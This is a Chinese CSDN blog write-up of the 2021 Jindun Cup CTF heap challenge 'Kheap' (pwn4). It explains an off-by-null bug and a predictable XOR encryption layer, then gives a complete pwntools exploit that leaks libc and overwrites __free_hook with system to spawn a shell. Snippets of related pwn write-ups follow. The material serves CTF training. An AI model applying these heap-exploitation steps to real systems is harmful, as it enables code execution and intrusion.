2021 金盾杯 pwn4

最新推荐文章于 2023-07-19 15:54:27 发布
最新推荐文章于 2023-07-19 15:54:27 发布
阅读量370 收藏 1
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/121942716
版权

在这里插入图片描述
保护是全开的

add
在这里插入图片描述
我们注意到首先会对我们的输入内容进行加密。

在这里插入图片描述加密的算法里面大量用到随机数,但是不重要,伪随机我们可以通过在脚本中使用随机数来绕过。

在这里插入图片描述

有个off by null。

delete
在这里插入图片描述正常delete,没啥问题。

edit
在这里插入图片描述也存在那个off by off。

show
在这里插入图片描述
正常show,show出来我们需要解密。

所以整体看下来就是off by null然后加了一个加密程序。
我们只需要通过随机数绕过那个加密,利用malloc consilidate解决chunk大小不够,不好泄露地址的问题,就可以了。

exp

#coding:utf-8
from pwn import *
from ctypes import *
context.log_level='debug'
context.arch='amd64'

elf=ELF('./Kheap')
libc=ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc.so.6')
libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
time=libcc.time(0)
libcc.srand(time)

r = process('./Kheap')
def decode(a,b):
    s=''
    p=libcc.rand()%256
    q=libcc.rand()%256
    m=libcc.rand()%256
    global n
    if p+q>m:
            n=(p+q)%m
    else:
            n=p+q
    for idx in range(b):
            s+=chr(ord(a[idx])^n)
    return s

def add(a,b):
    r.sendlineafter('Chioce >> ','1')
    r.sendlineafter('Size: ',str(a))
    b=decode(b,len(b))
    r.sendafter('Note: ',b)

def edit(a,b):
    r.sendlineafter('Chioce >> ','3')
    r.sendlineafter('Index: ',str(a))
    b=decode(b,len(b))
    r.sendafter('Note: ',b)

def show(a):
    r.sendlineafter('Chioce >> ','4')
    r.sendlineafter('Index: ',str(a))

def delete(a):
    r.sendlineafter('Chioce >> ','2')
    r.sendlineafter('Index: ',str(a))

for i in range(0x10):
    add(0x78,'/bin/sh\x00')
        
for i in range(0x7):
    delete(0xf-i)

for i in range(3):
    delete(0xf-8-i)

r.sendline('1'*0x500)

edit(4,'\x00'*0x70+p64(0x280))
for i in range(0x8):
    add(0x78,'aaaaaaa')

add(0x78,'aaaaaaa')
key=n

show(0xe)

r.recvuntil('aaaaaaa')
data=r.recv(9)[1:]

libc_base_str=''
for i in range(8):
    libc_base_str+=chr(ord(data[i])^key)

libc_base=u64(libc_base_str)-libc.sym['__malloc_hook']-96-0x10
libc.address=libc_base
bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']

for i in range(3):
    delete(0xf-8-i)

for i in range(5):
    delete(0xf-6+i)

r.sendline('1'*0x500) #malloc consilidate

delete(8)

r.sendline('1'*0x500) #malloc consilidate

for i in range(3):
    add(0x78,'aaaaaaa')
    
delete(0xe)
add(0x58,'aaaaaaaa')
add(0x58,'\x00'*0x18+p64(0x81)+p64(libc.sym['__free_hook']))
add(0x78,'aaaaaaa')
add(0x78,p64(system_addr))
delete(0)

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku_pwn4
Vicl1fe的博客
10-26 453
https://blog.csdn.net/casuall/article/details/95865447
ctfshow pwn4
qq_39980610的博客
08-22 668
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
Bugku pwn4
、moddemod
05-26 247
找不到/bin/sh字符串,存在$0 这里因为64位程序与32位不同是通过寄存器传参的 思路,通过read函数溢出栈空间0x10大小,构造ROP链,调用system,通过rdi给system传参 exp from pwn import * p = remote('114.116.54.89' ,10004) rop = 0x4007d3 _system = 0x400570 bin_sh = 0x60111f p.recvuntil('Come on,try to pwn me') pa...
Pwn4 - Bugku
SkYe's Blog
10-22 386
Pwn4 - Bugku 程序基本情况 程序为64位,保护全关 代码审计 在main()函数中的read造成了栈溢出 IDAshift + F12检查有没有可疑字符串,同时检查有没有特殊函数如getshell() 在sub_400751()里面出现了调用system() 思路 main()函数存在栈溢出,可调用system()getshell,但是缺少一个参数/bin/sh。在字符串查找中...
2021 金盾 pwn3 wp
yongbaoii的博客
01-20 619
保护显然是全开 放size的chunk跟放地址的chunk挨着 然后数组能越界 所以当我们申请序号是16的chunk的时候 chunk的地址会写在chunk0的size地方 就造成了堆溢出 然后我们申请的chunk只能是large bin里的。 所以这道题说白了就是 2.27 large bin 堆溢出。 我们试图考虑利用攻击global_max_fast的手法,我们虽然能够覆盖到global_max_fast,但是我们申请的chunk的大小不够,不够我们后续的chunk释放分配到_IO_list_.
pwn4记录
weixin_55190422的博客
11-08 117
我们利用shift F12过滤找到 看一下保护措施 main反编译后的函数为这样 可以看到s的长度为0x3c,而我们只能输入32个字符,但是我们发现我们输入的I会被系统替换成you,所以我们输入20个I就可以填满S了。所以EXP: ...
pwn4-bugku
weixin_45427676的博客
09-18 713
checksec 首先用checksec命令查看有没有什么保护机制 没有开任何保护机制,用IDA(64位)打开查看main函数。 函数分析 # memset函数 # setvbuf函数 # read函数 经过分析函数可以知道缓冲区中是&s,大小为0x10uLL,read函数是将大小为0x30uLL的数据存放到缓冲区&s中,其大小超过了缓冲区的大小,存在栈溢出。 s大小 ...
2021-河南省金盾-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
金盾2022-AGCTFS战队 wp
akxnxbshai的博客
12-20 2430
信安金盾pwn爷(加re)不在,只能打成这样了。
2020年12月20日-河南省金盾 JDBCTF Crypto+Misc题目打包
12-21
2020年河南金盾 JDBCTF Crypto+Misc题目打包下载
第二届金盾信安 web wp1-3
giaogiao123的博客
12-22 3177
by 七岁。 web1 考察命令执行 shell命令操作符 基本上过滤了所有可用的命令 平时我们都是ls 查看目录 仔细发现dir命令并没有被禁止 所以我们可以dir%09.%09 也是这样的 . 表示当前目录 然后就是读文件命令 被ban了那么多还有几个忽略了 cut 命令awk sed fmt等等 来看看cut命令 试一试别的 等等,最后payload cmd=cut%09-f%091%09F14g_1s_h4rehaha.php%09 web2 payload: Class W
河南省“第三届金盾信安“部分WP
MXPXT的博客
01-05 998
河南省"第三届金盾信安"部分WP Crypto Hi There 下载文件,打开发现一串字符,搜索在线栅栏解密,每组字数为4得到flag 低音吉他普 工具(base全家桶):https://github.com/mufeedvh/basecrack 下载文件发现一大串字符用base32解密, 得到字符串用base64解密, 得到字符串用base32解密, 得到字符串用base16解密, [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LMH5BnZh-1641391
2021-12-12金盾Re Wp
qq_52250819的博客
12-15 521
Re1 flag = 'gnbc~0221gg00>4f;g221944=1>62c61=3d71~' key = [1,2,3,4,5,6,7] aaa = [] for i in range(0,len(flag)): a=ord(flag[i]) aaa.append(a^key[i%7]) print(''.join(map(chr,aaa))) flag{6533dc5695d8c74686794813a5585c63} Re2 Main函数没有用.
第二届金盾信安部分wp
doraemon12345的博客
12-21 798
1.注意数字 打开压缩包是个图片,分离得到一个加密压缩包,看似加密实则是伪加密,修正后得到1.txt,是一个多层base64,解密后得到 但是这并不是flag,题目提示注意数字,图片上是李白的诗,有数字3和9,一开始以为是凯撒或者栅栏,试过之后无果,就去查还有哪些移位密码,找到仿射密码比较符合已知条件解密得到flag 2.小火龙 下载文件是个jpg图片放到winhex里查看,发现是png图片,拉到最底部,看到压缩包flag.txt,和pass 手动分离得到压缩包,然后用密码打开得到flag 3.我和十
第二届“金盾信安网络安全大赛misc部分wp
没用的阿吉
02-06 856
文章目录前言一、4位数字二、小火龙三、五瓶药水 前言 全为miscwp 一、4位数字   下载后得到一个压缩包,打开需要密码,文件名已经提示为四位数字,所以直接上ARCHPR进行爆破   爆破拿到密码9156   打开后是两个文件   在路飞的烦恼中直接看到社会主义核心价值观直接解密,贴上解密网址https://ctf.bugku.com/tool/cvecode解密后得到 ++++++++[>>++>++++>++++++>++++++++>+++++++++
[BUUCTF-pwn] 26-pwn4
weixin_52640415的博客
02-16 234
后边这两个都是格式化字符串漏洞,而且一看就是。不过都作了些限制。printf漏洞原则上可以写到任意位置也可以漏洞任意位置。这个难度就在于怎么绕过限制。 这题限制比较简单:长度只有32字节。 unsigned __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s[24]; // [rsp+0h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp+18h] [rbp-8h]
第三届金盾信安网络安全大赛_web_上传你的压缩包吧
Sk1y的博客
12-13 808
第三届金盾信安网络安全大赛_web_上传你的压缩包吧
Pwn buuctf题解心得
xiaolei0413的博客
07-19 137
可以看到刚刚输入的字符串对应两个地址 ,左边的d094存放的是字符串真正的地址,就是d0b8存放着字符串。按道理printf第一个参数应该就是d094了,但是前面还出现了一次这个函数,所以真正的第一个参数地址应该是d090.至于为什么是输入4,刚好%n前输入了一个地址就是四个字节的,那么对应d0b8中的地址就会被赋值为4.然后0x0804C044就是。这样就是指定修改d0b8的值了。的值,现在就是把printf第一个参数,也就是找输入的字符串会保存在哪个位置。,一个很明显的格式化字符串漏洞。
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值